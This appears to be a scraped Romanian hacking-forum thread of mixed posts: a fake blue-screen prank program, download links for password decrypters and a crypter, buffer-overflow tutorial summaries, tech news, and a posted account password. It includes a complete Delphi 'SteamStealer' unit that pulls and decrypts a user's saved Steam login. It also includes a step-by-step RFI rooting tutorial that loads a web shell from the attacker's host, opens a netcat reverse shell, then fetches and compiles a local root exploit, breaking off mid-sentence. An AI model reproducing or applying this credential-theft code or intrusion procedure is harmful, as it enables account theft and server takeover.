Nytro

Codul sursa a fost generat automat de Photoshop ( banuiesc ).

Author: Uranium-239 #include <windows.h> #define SCREEN(x) GetSystemMetrics(*x == 'X' ? SM_CXSCREEN : SM_CYSCREEN) LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM); char szClassName[ ] = "WindowsApp"; const char * BSOD_TEXT[] = { "-A problem has been detected and Windows has been shut down to prevent damage", "-to your computer.", "*The problem seems to have been caused by the following file: SPCMDCON.SYS", "*PAGE_FAULT_IN_NONPAGED_AREA", "*If this is the first time you've seen this Stop error screen,", "-restart your computer. If this screen appears again, follow", "-these steps:", "*Check to make sure any new hardware or software is properly installed.", "*If this is a new installation, ask your hardware or software manufacturer", "-for any Windows updates you may need", "*If problems continue, disable or remove any newly installed hardware", "-or software. Disable BIOS memory options such as caching or shadowing.", "*If you need to use Safe Mode to remove or disable components, restart", "-your computer, press F8 to select Advanced Startup Options, and then", "-select Safe Mode.", "*Technical Information:", "**** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)", "**** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c" }; void PRINT_TEXT(HDC hDC){ unsigned char k = 0; unsigned short y_co = 30; while(k <= 17){ if(BSOD_TEXT[k][0] == '*') y_co += 23; TextOut(hDC,10,y_co+(k*23),BSOD_TEXT[k]+1,lstrlen(BSOD_TEXT[k])-1); k++; } } int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil){ HWND hwnd; MSG messages; WNDCLASSEX wincl; wincl.hInstance = hThisInstance; wincl.lpszClassName = szClassName; wincl.lpfnWndProc = WindowProcedure; wincl.style = CS_DBLCLKS; wincl.cbSize = sizeof (WNDCLASSEX); wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION); wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION); wincl.hCursor = LoadCursor (NULL, IDC_ARROW); wincl.lpszMenuName = NULL; wincl.cbClsExtra = 0; wincl.cbWndExtra = 0; wincl.hbrBackground = CreateSolidBrush(RGB(0,0,0x77)); if (!RegisterClassEx (&wincl)) return 0; ShowCursor(FALSE); hwnd = CreateWindowEx ( 0, szClassName, "BSOD", WS_POPUP, 0, 0, SCREEN("X"), SCREEN("Y"), HWND_DESKTOP, NULL, hThisInstance, NULL ); ShowWindow (hwnd, nFunsterStil); while(GetMessage (&messages, NULL, 0, 0)){ TranslateMessage(&messages); DispatchMessage(&messages); } return messages.wParam; } HDC hDC; PAINTSTRUCT ps; HFONT hFont; LRESULT CALLBACK WindowProcedure(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam){ switch(message){ case WM_DESTROY: PostQuitMessage(0); break; case WM_PAINT: hDC = BeginPaint(hwnd,&ps); hFont = CreateFont( 26, 16, 0, 0,FW_NORMAL, FALSE, FALSE, FALSE, ANSI_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY,DEFAULT_PITCH|FF_ROMAN,"Courier New" ); SelectObject(hDC, hFont); SetTextColor(hDC,RGB(0xFF,0xFF,0xFF)); SetBkColor(hDC,RGB(0,0,0x77)); PRINT_TEXT(hDC); DeleteObject(hFont); EndPaint(hwnd, &ps); break; default: return DefWindowProc (hwnd, message, wParam, lParam); } return 0; } Screenshot: http://i30.tinypic.com/6qdsmw.jpg

Mozilla Firefox 3.5 Password Decrypter Credits: bl4cksun.org Download: http://www.2shared.com/file/7142545/68574f27/firefox35decrypter.html

Steam® application password decrypter. Credits: bl4cksun.org Download: http://www.2shared.com/file/7142526/a704b91b/steam_password_reader.html

Mai gasiti aici: http://th3-0utl4ws.com/localroot/

Buffer Overflow Basics Video Series! In this video series we will learn the basics of Buffer Overflow attacks and demonstrate how one can exploit Buffer Overflows in programs for fun and profit. The pre-requisite for this video series is that you are familiar with Assembly language. If you are not familiar with Assembly language, no worries, I have created detailed video tutorials for Assembly language here - Assembly Language Primer for Hackers. 1. Smashing the Stack In Part 1 of the Buffer Overflow series we will look at why buffer overflow attacks happen. We will discuss how the program stack is laid out when a function call happens, then how a buffer can be overwritten if proper bounds checking does not happen and finally how a hacker could take control of the program by overwriting the return address stored on the stack to an arbitrary value. Buffer Overflow Primer Part 1 (Smashing the Stack) Tutorial 2. Writing Exit Shellcode In this video we will look at how to create Shellcode which we can use as payload while exploiting a buffer overflow vulnerability. Buffer Overflow Primer Part 2 (Writing Exit Shellcode) Tutorial 3. Executing Shellcode In the last video we saw how to create shellcode from assembly language code, this video will concentrate on how to execute the shellcode from within a C program to check that it is working properly. Buffer Overflow Primer Part 3 (Executing Shellcode) Tutorial 4. Disassembling Execve In this video we will look at how to create shellcode for the Execve() syscall. We will first create a C program to spawn a shell using Execve(), then we will disassemble the program to understand how the syscall works and the kind of inputs it expects. Buffer Overflow Primer Part 4 (Disassembling Execve) Tutorial 5. Shellcode for Execve In this video we will learn how to convert the shellcode created in the previous video to a more usable format. It is important to note that the shellcode in the previous video cannot be used as-is becuase it contains NULLs and hardcoded addresses. Thus we need to convert it into something which can be injected into a buffer - i.e. we need to remove the NULLs and setup relative addressing. This video will show how we can replace the NULLs in the shellcode with instructions which results in non-NULL shellcode. Also, we discuss in detail how we can setup relative addressing within the shellcode and modify it at runtime to make it work. Buffer Overflow Primer Part 5 (Shellcode for Execve) Tutorial 6. Exploiting a Program In this video we will understand how to use the shellcode created in the previous video to exploit an actual program. Buffer Overflow Primer Part 6 (Exploiting a Program) Tutorial 7. Exploiting a Program Demo In this video we will do a buffer overflow exploitation demo using HackYou.c and ExploitMe.c Buffer Overflow Primer Part 7 (Exploiting a Program Demo) Tutorial 8. Return to Libc Theory In this video we will look at how to subvert the NX protection mechanism. The NX protection mechanism basically marks the stack, heap etc. as Non-Executable. This means the processor will not execute any instruction which is on them. From a stack overflow standpoint, this is a problem as our entire shellcode is on the stack, which now has been marked "Non-Executable". The way we counter this problem, is by using a technique called "Return to Libc". Buffer Overflow Primer Part 8 (Return to Libc Theory) Tutorial 9. Return to Libc Demo In this video we will do a hands on demo of exploiting a stack protected by NX using the Return to Libc exploitation process. We use GDB and attach it to the vulnerable program to find the address of "/bin/bash" in it's memory. Once this address is found, we modify Ret2libc.c and launch the attack on the vulnerable program. The successful exploitation leads to spawning of a shell. Buffer Overflow Primer Part 9 (Return to Libc Demo) Tutorial Thanks, Vivek

Windows 8 vine in 2012 de Mina Hutterer | 8 august 2009 Desi Windows 7 va fi lansat abia in octombrie, conform unei imagini aparent "scapate" de sucursala italiana Microsoft, compania a programat deja lansarea lui Windows 8 in 2012. Autenticitatea imaginii nu poate fi verificata, insa o lansare estimata peste trei ani nu este deloc nerealista. In cazul in care imaginea este autentica, aceasta cifra este doar o estimare interna a companiei Microsoft. In plus, 2012 este precedat de ~ in imagine, ceea ce denota o data aproximativa. Pana la Windows 8, Windows 7 va fi lansat in luna octombrie a acestui an si, pana acum, Microsoft a reusit sa starneasca valva in jurul noului sistem de operare, care a fost destul de bine primit, mai ales de catre utilizatorii care au reticente in a renunta la Windows XP.

Windows 7 va avea "grafica" DirectX 11 de Mina Hutterer | 7 august 2009 Prin Windows 7, Microsoft doreste sa ofere un sistem de operare capabil sa foloseasca eficient hardware-ul video din sistem. Compania colaboreaza strans cu NVIDIA si AMD (ATI) pentru a se asigura ca nu va exista niciun fel de problema intre Windows 7 DirectX 11 si driverele placilor cu chipset GeForce si Radeon. Unul dintre avantajele principale ale lui DirectX 11 este, de exemplu, posibilitatea sistemului de operare de a reda material video fara a solicita CPU-ul - direct prin placa grafica. Mai mult decat atat, un reprezentant AMD afirma ca DirectX 11 va permite un nivel de realism in jocuri imposibil pana acum. AMD are planuri sa lanseze primele placi compatibile cu DirectX 11 in octombrie 2009, odata cu lansarea lui Windows 7. Iata caracteristicile principale ale lui DirectX 11: o Full support (including all DX11 hardware features) on Windows Vista as well as future versions of Windows o Compatibility with DirectX 10 and 10.1 hardware, as well as support for new DirectX 11 hardware o New compute shader technology that lays the groundwork for the GPU to be used for more than just 3D graphics, so that developers can take advantage of the graphics card as a parallel processor o Multi-threaded resource handling that will allow games to better take advantage of multi-core machines o Support for tessellation, which blurs the line between super high quality pre-rendered scenes and scenes rendered in real-time, allowing game developers to refine models to be smoother and more attractive when seen up close

Cryptosy Mod By Smokin3000 Download: http://www.2shared.com/file/7135910/43a75220/Cryptosy_Mod_By_Smokin3000.html

'--------------------------------------------------------------------------------------- ' Module : mLockedFiles ' DateTime : 11/08/2009 02:10 ' Author : SqUeEzEr ' Mail : scott_van_dinter@hotmail.com@hotmail.com ' Purpose : Close filehandles owned by other processes ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Reference : Deleting locked files ' http://www.codeguru.com/cpp/w-p/files/fileio/article.php/c1287 ' ' History : 11/08/2009 First Cut.................................................... '--------------------------------------------------------------------------------------- Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Private Declare Function NtDuplicateObject Lib "NTDLL.DLL" (ByVal hSourceProcess As Long, ByVal hSourceHandle As Long, ByVal hCopyProcess As Long, CopyHandle As Long, ByVal DesiredAccess As Long, ByVal Attributes As Long, ByVal Options As Long) As Long Private Declare Function NtClose Lib "NTDLL.DLL" (ByVal ObjectHandle As Long) As Long Public Declare Function CreateToolhelp32Snapshot Lib "Kernel32.dll" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long Public Declare Function Process32First Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Public Declare Function Process32Next Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Public Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long Public Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Public Declare Function RtlAdjustPrivilege Lib "ntdll" (ByVal Privilege As Long, ByVal Enable As Boolean, ByVal Client As Boolean, WasEnabled As Long) As Long Public Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long ' Identifier of the process th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * 260 End Type Private Const FILE_FLAG_BACKUP_SEMANTICS As Long = &H2000000 Private Const GENERIC_ALL As Long = &H10000000 Private Const FILE_SHARE_READ As Long = &H1& Private Const FILE_SHARE_WRITE As Long = &H2& Private Const OPEN_EXISTING As Long = 3& Private Const DUPLICATE_CLOSE_SOURCE = &H1 Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Public Const TH32CS_SNAPPROCESS As Long = &H2 Public Function Closehandles(sFileName As String) As Boolean Dim hFile As Long Dim pInfo As PROCESSENTRY32 Dim hSnapshot As Long Dim lSuccess As Long Dim lRet As Long Dim hProcess As Long Call RtlAdjustPrivilege(20, True, True, 0) hFile = CreateFile(sFileName, GENERIC_ALL, FILE_SHARE_WRITE And FILE_SHARE_READ, 0&, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, 0&) hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pInfo.dwSize = Len(pInfo) lSuccess = Process32First(hSnapshot, pInfo) If hSnapshot = -1 Then Debug.Print "Unable to take snapshot of process list!" Else Do While lSuccess <> 0 hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, pInfo.th32ProcessID) Call NtDuplicateObject(hProcess, hFile, 0, ByVal 0, 0, 0, DUPLICATE_CLOSE_SOURCE) Call NtClose(hProcess) pInfo.dwSize = Len(pInfo) lSuccess = Process32Next(hSnapshot, pInfo) Loop lRet = CloseHandle(hSnapshot) End If Closehandles = True End Function Usage: If Closehandles("C:\file.txt") Then Kill "C:\file.txt"

While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utililise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures, if you trust the source of the component then it is safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a “sandbox”, thus limiting what the Applet has access to. Well that’s how the sandbox works in theory at least. In other words, you better trust the authors of the ActiveX component. In this paper, I won’t be focusing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable malicious individuals to compromise a user’s computer, simply by guiding them to a malicious web site. In other words, no actions, on the part of the user, are required for remote code execution. The paper ( by shape ) can be viewed here: http://blog.sat0ri.com/wp-content/uploads/2009/08/Identifying-Vulnerabilities-in-ActiveX-Controls.pdf

Gata, am inteles cum sta treaba si cred ca am facut si pace.

De curiozitate, care e rtatul care copiaza de pe acest forum?

Da, si raspunsurile imi par cunoscute Copil fara viitor. PS: Care mm scrie cu contul meu? User: Nytro Pass: adminxxx

White Hat Hacking course, part 1: http://www.tudy.ro/2008/11/15/white-hat-hacking-course-part-1/ White Hat Hacking course, part 2: http://www.tudy.ro/2008/11/24/white-hat-hacking-part-2/ White Hat Hacking, part 3: http://www.tudy.ro/2008/12/05/white-hat-hacking-part-3/

by -bRx- Function UltimoNickUsadoInGame:String; = latest nick in game Function UserCounterStrikeRate:String; = latest rate set by user Function DiretorioDaSteam:String; = steam directory Function DiretorioDoExecutavelSteam:String; = exe steam dir Function ConfiguracaoDeIdioma:String; = language Function EnviarDadosSTEAM:String; all results in this function {********************************************************************************************* *-----------=*@@=------------------*@@*.----------------------------------------------------* *----------.@@@@@@@%-.-------------@@@@@@@#=------------- ::--------@#-.--------------------* *-----------=@@@*-@@@@@@@@#:---------@@@@#@@@@@#+: -----@@@@#------@@@@=--------------------* *------------#@@@----- :-%@@@@--------@@@=---#%@@@@-- =@@@@@@@:---#@@@+---------------------* *- .:- ---@@@#-------:@@@%---------+@@*----*@@@%@@@@@@@*@@@%-+@@@*------- .:-:------* *@@@@@@@@@=----@@@ ----*@@@@%#@@@@@@@@#:#@@#:@@@@@@@#-@@@%-- @@@@@@@--------@@@@@@@@@@------* *#%%@@@#*------=@@%--@@@@@@@@@@@%#%@@@@@@@@@@@@@@+.--*@@*----- @@@@@ -------*%@%@@%#+-------* *---------------@@@@@@@@@#-.---------=@@@@@@@@.-----#@@*------=@@@@@@@.---------------------* *-------------+@@@@@%: ---------------@@@@+@@@------@@@------*@@@: @@@@#--------------------* *------------.#+.@@@*-----------------@@@@-=@@%----@@@------+@@@-----@@@@+------------------* *----------------=@@@----------------%@@@ --#=.---+@@+------@@@+------#@@@@.----------------* *----------------.@@@--------------*@@@@----------@@@-----:@@@#-------- @@@@#---------------* *-----------------#- --------- -%@@@@%:-----------@@%------@@@------+#@@@@@@@@+-------------* *--------------.-=:.:-=+*%@@@@@@@@#---------------@@%---------------@@@@%*=-:::-------------* *--------------- .-=**%%%%#*+:.-------------------@@@----------------- ---------------------* *-------------------------------------------------.@@ --------------------------------------* ********************************************************************************************* Author: counterstrikewi and -bRx- please give credits case of use it } unit SteamStealerUnitBybRx; interface uses Windows, CompressionStreamUnit; type LongRec = packed record case Integer of 0: (Lo, Hi: Word); 1: (Words: array [0..1] of Word); 2: (Bytes: array [0..3] of Byte); end; { TStringStream } TStringStream = class(TStream) private FDataString: string; FPosition: Integer; protected procedure SetSize(NewSize: Longint); override; public constructor Create(const AString: string); function Read(var Buffer; Count: Longint): Longint; override; function ReadString(Count: Longint): string; function Seek(Offset: Longint; Origin: Word): Longint; override; function Write(const Buffer; Count: Longint): Longint; override; procedure WriteString(const AString: string); property DataString: string read FDataString; end; const { File open modes } {$IFDEF LINUX} fmOpenRead = O_RDONLY; fmOpenWrite = O_WRONLY; fmOpenReadWrite = O_RDWR; // fmShareCompat not supported fmShareExclusive = $0010; fmShareDenyWrite = $0020; // fmShareDenyRead not supported fmShareDenyNone = $0030; {$ENDIF} {$IFDEF MSWINDOWS} fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000 platform; // DOS compatibility mode is not portable fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030 platform; // write-only not supported on all platforms fmShareDenyNone = $0040; {$ENDIF} function SteamUserName : String; function SteamPassword : String; Function UltimoNickUsadoInGame:string; Function UserCounterStrikeRate:string; Function DiretorioDaSteam:string; Function DiretorioDoExecutavelSteam:string; Function ConfiguracaoDeIdioma:string; Function EnviarDadosSTEAM:string; type TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; cdecl; var SteamPath : String; StringStream : TStringStream; FileStream : TFileStream; I : Integer; UserName : PChar; EncryptedPassword : PChar; DecryptionKey : TSteamDecryptDataForThisMachine; PasswordLength : UINT; Password : array[0..99] of char; implementation function PegaValor( const Key: HKEY; const Chave, Valor: String ) : String; var handle : HKEY; Tipo, Tam : Cardinal; Buffer : String; begin RegOpenKeyEx( Key, PChar( Chave ),0, KEY_ALL_ACCESS, handle ); Tipo := REG_NONE; RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,nil,@Tam ); SetString(Buffer, nil, Tam); RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,PByte(PChar(Buffer)),@Tam ); Result := PChar(Buffer); RegCloseKey( handle ); Result := PChar(Buffer); end; procedure FreeAndNil(var Obj); var Temp: TObject; begin Temp := TObject(Obj); Pointer(Obj) := nil; Temp.Free; end; { TStringStream } constructor TStringStream.Create(const AString: string); begin inherited Create; FDataString := AString; end; function TStringStream.Read(var Buffer; Count: Longint): Longint; begin Result := Length(FDataString) - FPosition; if Result > Count then Result := Count; Move(PChar(@FDataString[FPosition + 1])^, Buffer, Result); Inc(FPosition, Result); end; function TStringStream.Write(const Buffer; Count: Longint): Longint; begin Result := Count; SetLength(FDataString, (FPosition + Result)); Move(Buffer, PChar(@FDataString[FPosition + 1])^, Result); Inc(FPosition, Result); end; function TStringStream.Seek(Offset: Longint; Origin: Word): Longint; begin case Origin of soFromBeginning: FPosition := Offset; soFromCurrent: FPosition := FPosition + Offset; soFromEnd: FPosition := Length(FDataString) - Offset; end; if FPosition > Length(FDataString) then FPosition := Length(FDataString) else if FPosition < 0 then FPosition := 0; Result := FPosition; end; function TStringStream.ReadString(Count: Longint): string; var Len: Integer; begin Len := Length(FDataString) - FPosition; if Len > Count then Len := Count; SetString(Result, PChar(@FDataString[FPosition + 1]), Len); Inc(FPosition, Len); end; procedure TStringStream.WriteString(const AString: string); begin Write(PChar(AString)^, Length(AString)); end; procedure TStringStream.SetSize(NewSize: Longint); begin SetLength(FDataString, NewSize); if FPosition > NewSize then FPosition := NewSize; end; function StrLen(const Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function FileAge(const FileName: string): Integer; {$IFDEF MSWINDOWS} var Handle: THandle; FindData: TWin32FindData; LocalFileTime: TFileTime; begin Handle := FindFirstFile(PChar(FileName), FindData); if Handle <> INVALID_HANDLE_VALUE then begin Windows.FindClose(Handle); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit; end; end; Result := -1; end; {$ENDIF} {$IFDEF LINUX} var st: TStatBuf; begin if stat(PChar(FileName), st) = 0 then Result := st.st_mtime else Result := -1; end; {$ENDIF} function FileExists(const FileName: string): Boolean; {$IFDEF MSWINDOWS} begin Result := FileAge(FileName) <> -1; end; {$ENDIF} {$IFDEF LINUX} begin Result := euidaccess(PChar(FileName), F_OK) = 0; end; {$ENDIF} // Senha:=PegaValor(HKEY_LOCAL_MACHINE,'Software\Vitalwerks\DUC','Password'); function SteamUserName : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates UserName within the SteamAppData.vdf file FileStream := TFileStream.Create(SteamPath+'\config\SteamAppData.vdf',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('AutoLoginUser',StringStream.DataString); I := I + 17; UserName := PChar(copy(StringStream.DataString,I,Pos('"',copy(StringStream.DataString,I,100))-1)); FreeandNil(StringStream); Result := UserName; except Result := 'Error'; end; end; function SteamPassword : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates Encrypted Password within the ClientRegistry.blob file if not FileExists(SteamPath+'/ClientRegistry.Blob') then begin Result := 'Não foi possível encontrar o arquivo necessário para pegar o password.' ;Exit; end else begin FileStream := TFileStream.Create(SteamPath+'\ClientRegistry.blob',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('Phrase',StringStream.DataString); I := I + 40; EncryptedPassword := PChar(copy(StringStream.DataString,I,255)); FreeandNil(StringStream); //Uses SteamDecryptDataForThisMachine function from Steam.dll to decrypt password DecryptionKey := GetProcAddress(LoadLibrary(PChar(SteamPath+'\steam.dll')),'SteamDecryptDataForThisMachine'); DecryptionKey(EncryptedPassword, strlen(EncryptedPassword),@Password, 100,@PasswordLength); Result := Password; end; except Result := 'Error'; end; end; Function UltimoNickUsadoInGame:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','LastGameNameUsed'); End; Function UserCounterStrikeRate:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Rate'); End; Function DiretorioDaSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); End; Function DiretorioDoExecutavelSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamExe'); End; Function ConfiguracaoDeIdioma:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); End; Function EncontrouSteam:Boolean; var VerificaString:string; Begin Result := False; VerificaString := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); if VerificaString<>'' then Result := True else Result := False; End; Function EnviarDadosSTEAM:string; var Enter:string; Begin Enter := #13#10; if EncontrouSteam then begin Result := 'Login: '+SteamUserName + Enter + 'Senha: '+SteamPassword + Enter + 'Ultimo Nick usado: '+UltimoNickUsadoInGame + Enter + 'Rate do Usuário: ' +UserCounterStrikeRate + Enter + 'Diretório da Steam: '+DiretorioDaSteam + Enter + 'Diretório do Executavel Steam: '+DiretorioDoExecutavelSteam + Enter + 'Configuração de Idioma do Usuário: '+ConfiguracaoDeIdioma + Enter ; end else Result := 'Não foi possível encontrar os dados. Possíveis causas: Diretório da steam ou DLL não encontrada, ou talvez o arquivo esteja sendo usada por outro processo'; end; end. Download: http://www.2shared.com/file/7117962/32213e20/SteamStealer.html

by mjrod5: You can flame me or whatever you want... Here is code i made =) Seems like delphi doesnt support invoke, only call xP Have fun doing nothing with this program InlineASM; uses Windows; var _msg: String = 'Inline ASM, Delphi'; _cpt: String = 'woot!'; begin asm //MessageBox: function(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer; push 0 //uType push _cpt //lpCaption push _msg //lpText push 0 //hWnd call messagebox //Call the MessageBoxAPI with params you pushed //Delphi Equivalent would be //MessageBox(0,PChar(_msg),PChar(_cpt),0); end; end.

Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long Private Type OSVERSIONINFO OSVersionInfoSize As Long MajorVersion As Long MinorVersion As Long BuildNumber As Long PlatformId As Long szCSDVersion As String * 128 End Type Private Type OSVERSIONINFOEX dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 wServicePackMajor As Integer wServicePackMinor As Integer wSuiteMask As Integer wProductType As Byte wReserved As Byte End Type Public Function GetWindowsVersion() As String Dim OS As OSVERSIONINFO Dim durum As Boolean Dim version As String OS.OSVersionInfoSize = Len(OS) durum = GetVersionEx(OS) version = OS.PlatformId & "." & OS.MajorVersion & "." & OS.MinorVersion Select Case version Case "1.4.0" GetWindowsVersion = "Win 95" Case "1.4.10" GetWindowsVersion = "Win 98" Case "1.4.98" GetWindowsVersion = "Win ME" Case "2.3.51" GetWindowsVersion = "Win NT 3" Case "2.4.0" GetWindowsVersion = "Win NT 4" Case "2.5.0" GetWindowsVersion = "Win 2000" Case "2.5.1" GetWindowsVersion = "Win XP" Case "2.6.0" GetWindowsVersion = "Win Vista" Case "2.6.1" GetWindowsVersion = "Win Seven" Case Else GetWindowsVersion = "Unknown" End Select End Function Private Sub Form_Load() MsgBox GetWindowsVersion() End Sub

DIE (Detect it Easy) detects most common packers, cryptors and compilers for PE files. Download: http://www.2shared.com/file/7117852/18ce07d4/Detect_it_easy.html

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH Mail/MSN: admin@cyberanarchy.org / anasa_staxth@hotmail.com For Cyber Anarchy (Nov. 2007) ----------------------------------------------------------------------- You will need: - Vulnerable Site in R.F.I. - Shell for R.F.I. (e.g. c99, r57 or other) - NetCat - Local Root Exploit (depending on the kernel and the version) This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF. Suppose that we have found a site with R.F.I. vulnerability: http://www.hackedsite.com/folder/index.html?page= e can run shell exploiting Remote File Inclusion, as follows: http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells) After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname - a in Command line. To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell. We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57). Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way: We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port. We press in Windows Start -> Run -> and we type: cmd After we will go to the NetCat directory: e.g. cd C:\Program Files\Netcat And we type the following command: nc -n -l -v -p 11457 NetCat respond: listening on [any] 11457 ... In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic) In the Port form we will put the port that we opened and NetCat listens. If we press connect the shell will respond: Now script try connect to <IP here> port 11457 ... If our settings are correct NetCat will give us a shell to the server Now we wil continue to the Rooting proccess. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don't have the correct permissions. List of the exploits/kernel: 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit 2.6.5 -> krad, krad2, h00lyshit 2.6.6 -> krad, krad2, h00lyshit 2.6.7 -> krad, krad2, h00lyshit 2.6.8 -> krad, krad2, h00lyshit 2.6.8-5 -> krad2, h00lyshit 2.6.9 -> krad, krad2, h00lyshit 2.6.9-34 -> r00t, h00lyshit 2.6.10 -> krad, krad2, h00lyshit 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit. Some sites that we can find Local Root Exploits: www.milw0rm (Try Search: "linux kernel") Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin' you can find 'em all We can find writable folders/files by typing: find / -perm -2 -ls We can use the /tmp folder which is a standard writable folder We type: cd /tmp To download the local root exploit we can use a download command for linux like wget. For example: wget http://www.arblan.com/localroot/h00lyshit.c where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit. After the download we must compile the exploit (Read the instruction of the exploit before the compile) For the h00lyshit we must type: gcc h00lyshit.c -o h00lyshit Now we have created the executable file: h00lyshit. The command to run this exploit is: ./h00lyshit <very big file on the disk> We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or into another writable folder. The command is: dd if=/dev/urandom of=largefile count=2M where largefile is the filename. We must wait 2-3 minutes for the file creation If this command fails we can try: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Now we can procced to the last step. We can run the exploit by typing: ./h00lyshit largefile or ./h00lyshit /tmp/largefile (If we are in a different writable folder and the largefile is created in /tmp) If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get 